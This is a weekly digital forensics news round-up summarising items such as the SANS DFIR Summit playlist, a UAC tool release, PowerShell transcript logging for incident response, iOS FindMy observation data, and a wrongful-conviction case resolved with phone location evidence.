A round-up of this week’s digital forensics news and views:
SANS DFIR Summit 2025 Playlist Released
SANS has released a comprehensive playlist from the DFIR Summit 2025 featuring cutting-edge digital forensics and incident response strategies. Content covers AI-driven workflows, covert command and control systems, cloud compromise scenarios, and macOS forensics techniques. The playlist provides real-world insights and practical strategies for cybersecurity professionals and digital defenders.
UAC v3.2.0 Released with New Features and Bug Fixes
Unix-like Artifacts Collector (UAC) v3.2.0 has been released with new features, additional artifacts, and bug fixes. UAC is an incident response tool designed for forensic investigators, security analysts, and IT professionals that automates artifact collection from Unix-like systems including AIX, ESXi, FreeBSD, Linux, macOS, NetBSD, NetScaler, OpenBSD and Solaris. The tool simplifies data collection for intrusion handling, forensic investigations, and compliance checks while reducing dependence on external support during critical incidents.
Coalition of Cyber Investigators Co-Founder Discusses OSINT Professionalization and Investment Fraud
Neal Ysart, co-founder of The Coalition of Cyber Investigators, discusses his organization’s mission to professionalize OSINT practices and combat investment fraud. Ysart and partner Paul Wright established the coalition as a think-tank combining 80+ years of experience in law enforcement, forensics, and intelligence operations. He emphasizes the need for standardized methodologies and warns against “OSINT cowboys” who compromise evidential integrity, while highlighting the coalition’s specialized work in investigating increasingly sophisticated boiler room investment scams.
Part 2 of 3: Running A Digital Forensic Business
Digital forensics expert Patrick Siewert outlines key strategies for operating a successful digital forensic professional services business. Marketing emerges as the single biggest budget item after software licenses, requiring targeted approaches to reach litigators rather than general attorneys or government entities. Siewert emphasizes the importance of proper pricing, networking within professional organizations, and building a strong personal brand through principled practice. He warns against underpricing services and advises setting aside 30% of revenue for taxes while maintaining commitment to long-term business growth.
Read more (dfirphilosophy.blogspot.com)
NCMEC Hash Value Integration Accelerates Child Exploitation Investigations
Cellebrite announces integration of the National Center for Missing and Exploited Children’s hash value list into its digital forensics software, allowing investigators to instantly identify known child sexual abuse material during device examinations. Integration significantly reduces investigation time by automatically flagging CSAM files from NCMEC’s database of approximately 10 million hashed files, while providing mental health protection for law enforcement by allowing them to redact explicit content. Despite receiving over 22 million CyberTipline reports in 2024, NCMEC warns that numbers have actually decreased due to reduced reporting from some platforms and increased use of end-to-end encryption.
PowerShell Transcripts: Essential Digital Forensics Tool for Incident Response
PowerShell transcripts function as “flight data recorders” for PowerShell activity, capturing both user commands and system outputs in plain-text logs. Eric Capuano explains how these transcripts can be enabled enterprise-wide through Group Policy or Intune, providing investigators with detailed session records including usernames, timestamps, host applications, and process IDs. Security teams can leverage transcripts alongside Script Block Logging to detect malicious activity, though the logs are tamper-able and require proper configuration with write-only network shares for maximum effectiveness.
iOS Search Party Database Reveals Detailed Device Tracking Data
Forensic researcher Binary Hick discovers that iOS devices maintain comprehensive records of all FindMy-compatible devices they encounter through an encrypted database called Observations.db. The database stores timestamps, precise location coordinates, signal strength, and MAC addresses of detected beacons, creating a detailed tracking log that updates frequently but deletes records rapidly. Binary Hick successfully decrypted the database using keys found in the iOS keychain and demonstrates how the data can help identify unwanted tracking devices like AirTags.
Read more (thebinaryhick.blog)
NJIT Forensics Team Uses Cell Data to Free Wrongly Imprisoned Man
Ray Wooden spent over a year in a Pennsylvania jail for a crime he didn’t commit before three NJIT forensic science students and graduates helped clear his name using cellphone location data. Wooden was falsely accused of firing shots at a Philadelphia home in what he described as retaliation for tipping off police about a woman involved in a home invasion. Mia LoRé, Carmen Cheung and Gillian Kongnyuy analyzed Wooden’s phone records and device data, conclusively showing his phone was never near the residence during the reported shootings and confirming he had possession of his device throughout. Philadelphia prosecutors dismissed all charges in July after the digital evidence proved Wooden’s innocence.
